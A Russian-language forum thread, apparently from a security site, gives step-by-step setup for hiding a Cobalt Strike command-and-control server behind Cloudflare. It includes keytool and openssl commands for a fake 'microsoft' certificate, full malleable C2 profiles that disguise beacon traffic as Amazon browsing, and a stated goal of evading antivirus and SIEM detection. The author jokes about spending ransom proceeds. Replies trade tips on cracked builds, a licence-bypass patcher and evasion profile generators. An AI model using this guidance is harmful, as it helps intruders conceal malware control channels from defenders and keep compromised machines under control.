• B правой части каждого сообщения есть стрелки и . Не стесняйтесь оценивать ответы. Чтобы автору вопроса закрыть свой тикет, надо выбрать лучший ответ. Просто нажмите значок в правой части сообщения.

настройка cobalt-strike CDN или прячем свой С2 за CloudFlare

Ondrik8

prodigy
Green Team
08.11.2016
1 129
3 189
BIT
0
Решил начать тему именно здесь так как в РУ сегменте данный вопрос не обсуждался, так же поступает много вопросов касаемо всем известной утилиты указанной в заголовке.
Почему Ондрик8 палится этот инструмент, почему я не могу по сети с ним ходить как показано у Рафаэля на картинках, да? Отвэчай Ондрык !!!

Screenshot_3.png


ну в общем, как то так живем....

Значит, к делу
Начну пожалуй с главного, а именно с того что в основном у всех ваш командный сервер в простонародий Ц2, с момента установки этого самого Cobalt-овича начинает палится, гореть и искрится на весь интернет, мало того вы и ваш сервер можете попасть в сводки новостей твиттера, как минимум... а почему "вы" да банально с мамкиной картонки эти сервера и покупаются потом доказывай что не верблюд)

Screenshot_4.png


ну и для полноты картины, а то по думаете что пытаюсь ввести в заблуждение, реально есть энтузиасты которым не..уй-чего делать)


так вот происходит это все дело из за лени тупости и не понимания как использовать данный инструмент, обьясню первую причину.

в файле teamserver , должны знать такой или слышали хотя бы, что это не бинарь а просто текстовый файл и его можно банально открыть в блокноте и в конце увидеть удивительные строки..


Screenshot_5.png


сама главная картинка темы)


Видим знакомые 5 цифр 50050 это порт приема сервера для приема подключения панели управления, его МОЖНО сменить, чуть выше сказано по немецки правда, что при желании можно сменить и сам сертификат для подключения к этому самому серверу. Это типа что бы вас никто не смог послушать типо МИТМу замутить пока вы там толпой ботов управляете, проще говоря..

Так вот, уже как бы ясно что если хотя бы сменить порт, уже появляется надежда на будущее к примеру сможете потратить деньги с которые вы получили с выкупа "размотанной" вами "сетки" не суть, а если еще и сертификат новый сгенерить и скормить ему, то на пир можно и противоположный пол, пригласить на кутеж!

Этим и займемся

Screenshot_6.png


Screenshot_7.png

оригинальные слайды, без моих комментариев

что бы это исправить нужно удалить файл с названием : cobaltstrike.store в его папке и создать свой сертификат:

Код:
keytool -keystore ./cobaltstrike.store -storepass 1234567zx -keypass 1234567zx -genkey -keyalg RSA -alias microsoft -dname "CN=microsoft LTD, OU=LTD, O=microsoft, L=SOM, S=COM, C=US"

Если сменили пароль к сертификату как в моем случае то его также нужно сменить:

Screenshot_8.png


как видно в последней строке...


результат изменений можете проверить командой:

Код:
keytool -list -v -keystore cobaltstrike.store

Далее для того что бы растворится в в легальном, защищенным трафике от систем защит АВ СИЕМ и прочей нечести нужно (желательно) привязать к IP адресу какой нить домен 1-ого уровня, любой [ major.ru ] к примеру..

И главное действо которое нужно сделать это регнутся в сервисе протекции и защиты , не реклама: cloudflare (хотя не отказался бы от премии, клиент по прет чую..)
там же прописать свой домен и подать без платную заявку на сертификат HTTPS (точно по прет) выдает он его быстро!

Screenshot_10.png


Screenshot_11.png


получим в формате PEM сам сертификат и ключи к нему, сохраняем в папке кобальта и прописываем в него же:

Код:
openssl pkcs12 -export -in b.pem -inkey b.key -out major.ru.p12 -name major.ru -passout pass:1234567zx


keytool -importkeystore -deststorepass 1234567zx -destkeypass 1234567zx -destkeystore major.ru.store -srckeystore major.ru.p12 -srcstoretype PKCS12 -srcstorepass 1234567zx -alias major.ru


И на конец для полного эффекта создадим "Гибкий профиль" что это и для чего он нужен можете узнать здесь, я всего лишь что вам не мучатся дам его код

Код:
https-certificate {
    set keystore "major.ru.store";
    set password "1234567zx";
}
http-stager {
    set uri_x86 "/api/1";
    set uri_x64 "/api/2";
    client {
        header "Host" "major.ru";}
    server {
        output{
        print;
        }
    }
        }
http-get {
    set uri "/api/3";
    client {
        header "Host" "major.ru";
        metadata {
            base64;
            header "Cookie";
        }
        }
    server {
        output{
        print;
        }
    }
        }
http-post {
    set uri "/api/4";
    client {
        header "Host" "major.ru";
        id {
            uri-append;
        }
        output{
        print;
        }
    }
    server {
        output{
        print;
        }
    }
}

Боевой профиль Амазон

Код:
# Боевой профиль Амазон
# Amazon browsing traffic profile
# 11 12 строку меняем

set sleeptime "5000";
set jitter    "0";
set maxdns    "255";
set useragent "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";

https-certificate {
    set keystore "major.ru.store";
    set password "1234567zx";
}


http-get {

    set uri "/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books";

    client {

        header "Accept" "*/*";
        header "Host" "www.amazon.com";

        metadata {
            base64;
            prepend "session-token=";
            prepend "skin=noskin;";
            append "csm-hit=s-24KU11BB82RZSYGJ3BDK|1419899012996";
            header "Cookie";
        }
    }

    server {

        header "Server" "Server";
        header "x-amz-id-1" "THKUYEZKCKPGY5T42PZT";
        header "x-amz-id-2" "a21yZ2xrNDNtdGRsa212bGV3YW85amZuZW9ydG5rZmRuZ2tmZGl4aHRvNDVpbgo=";
        header "X-Frame-Options" "SAMEORIGIN";
        header "Content-Encoding" "gzip";

        output {
            print;
        }
    }
}

http-post {
   
    set uri "/N4215/adj/amzn.us.sr.aps";

    client {

        header "Accept" "*/*";
        header "Content-Type" "text/xml";
        header "X-Requested-With" "XMLHttpRequest";
        header "Host" "www.amazon.com";

        parameter "sz" "160x600";
        parameter "oe" "oe=ISO-8859-1;";

        id {
            parameter "sn";
        }

        parameter "s" "3717";
        parameter "dc_ref" "http%3A%2F%2Fwww.amazon.com";

        output {
            base64;
            print;
        }
    }

    server {

        header "Server" "Server";
        header "x-amz-id-1" "THK9YEZJCKPGY5T42OZT";
        header "x-amz-id-2" "a21JZ1xrNDNtdGRsa219bGV3YW85amZuZW9zdG5rZmRuZ2tmZGl4aHRvNDVpbgo=";
        header "X-Frame-Options" "SAMEORIGIN";
        header "x-ua-compatible" "IE=edge";

        output {
            print;
        }
    }
}



Скармливаем его CS-ычу

Код:
./c2lint major.profile

и пробуем стартануть сам teamserver


Код:
teamservser 12.12.12.12 pass major.profile


по идее все должно быть хорошо и идеально но у меня ошибка... по этому позорных слайдов не будет(( но тема из разряда вопрос-ответ, и получить по идее должны:

Трояны общаются через CDN прокладку по защищенному соединению который уже на голову выше обычных с рядом преимуществ и т.д. то есть можно создавать Listener прямо указывая доменное имя так же можно их создать целую пачку и скормить CиSычу и тогда ваши звери будут жить дольше в вражеских ПК но ...

отпишите как у Вас это все происходит? )

ПС я подозреваю что в ломанном CS такое не провернешь ..
 
Последнее редактирование:

Ondrik8

prodigy
Green Team
08.11.2016
1 129
3 189
BIT
0
круто, вижу 4.3 ? ломаная или нет? если ломаная хде взять?))

вчера я вообще исходники его нашел) надо собрать... с ним по пробовать просто я перепробовал 3-4 сборки.. и нифига


в шарке все будет красиво, по идее сам посмотришь и это существенно снизит детект не самого бинаря а в сети размоется трафик кобушки...
 
Последнее редактирование:

Pernat1y

Well-known member
05.04.2018
1 443
135
BIT
0
круто, вижу 4.3 ? ломаная или нет? если ломаная хде взять?))
Это оригинальный 4.3 + лайв-патчер hook.jar.

вчера я вообще исходники его нашел) надо собрать... с ним по пробовать просто я перепробовал 3-4 сборки.. и нифига
Повсплывало много "сборок" 4.4, но все они основаны на кривом декомпиле. Плюс потенциальные трояны в комплекте.
4.3 сейчас самая нормальная версия.
 

Ondrik8

prodigy
Green Team
08.11.2016
1 129
3 189
BIT
0
Screenshot_12.png


у меня трабл этот не исчезает...(( проверил на 2вух серверах и 1 простом пк) даже на винде.. но там другое...

после смены кобы.. и т.д.

и Рафаэлычу не напишешь, не пожалуешься))
 
Последнее редактирование:

Ondrik8

prodigy
Green Team
08.11.2016
1 129
3 189
BIT
0
пришлось 4.4 искать , все хорошо полет хороший)


Screenshot_14.png


тема годная комуникация по https превосходит обычные tcp и http
 

Pernat1y

Well-known member
05.04.2018
1 443
135
BIT
0
Попробуй генерировать профили тем-же GitHub - threatexpress/random_c2_profile: Cobalt Strike random C2 Profile generator или GitHub - Tylous/SourcePoint: SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion. и уже потом прикручивать туда свои изменения (типа SSL).

и Рафаэлычу не напишешь, не пожалуешься))
Я в их саппорт баги репортил когда-то. Сказали "спасибо" :)
 

Ondrik8

prodigy
Green Team
08.11.2016
1 129
3 189
BIT
0
Попробуй генерировать профили тем-же GitHub - threatexpress/random_c2_profile: Cobalt Strike random C2 Profile generator или GitHub - Tylous/SourcePoint: SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion. и уже потом прикручивать туда свои изменения (типа SSL).


Я в их саппорт баги репортил когда-то. Сказали "спасибо" :)
да профили самое , то )) там только этот код нужно добавлять для https соединений:

Код:
https-certificate {
    set keystore "major.ru.store";
    set password "1234567zx";
}

и не подарили оригинал?) моему сансею когда то сам Рафаель дал оригинал лично, еще версия 3.4 или 3.2 помню))
 
Последнее редактирование:

Ondrik8

prodigy
Green Team
08.11.2016
1 129
3 189
BIT
0
они там ваще ах..ли)) что в шелкоде пишут..

Screenshot_13.png



теперь понятно почему кобушка палится последнее время

я ваще удивляюсь как мне удалось обойти АВ)))
 

Pernat1y

Well-known member
05.04.2018
1 443
135
BIT
0
да профили самое , то )) там только этот код нужно добавлять для https соединений:
Я заменил cobaltstrike.store на свой и оставил дефолтный пасс. ИМХО, так проще.

и не подарили оригинал?)
К сожалению нет :)

они там ваще ах..ли)) что в шелкоде пишут..
EICAR добавляется в бикон, если версия триал. Если грузить CS с тем-же hook.jar, то он считает себя лицензионным и строку не добавляет.
 

netuno

New member
31.03.2020
2
0
BIT
0
получим в формате PEM сам сертификат и ключи к нему, сохраняем в папке кобальта и прописываем в него же:
Парни, можна для "чайников" плз, чтото ход мысли потерял( "в него же" это куда ? заранее благодарствую за пояснеия. Всем Добра)
 

Pernat1y

Well-known member
05.04.2018
1 443
135
BIT
0
Парни, можна для "чайников" плз, чтото ход мысли потерял( "в него же" это куда ? заранее благодарствую за пояснеия. Всем Добра)
Это консольные команды для конвертации и импорта сертификата.
Прописывать, соответственно, в консоль :)
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!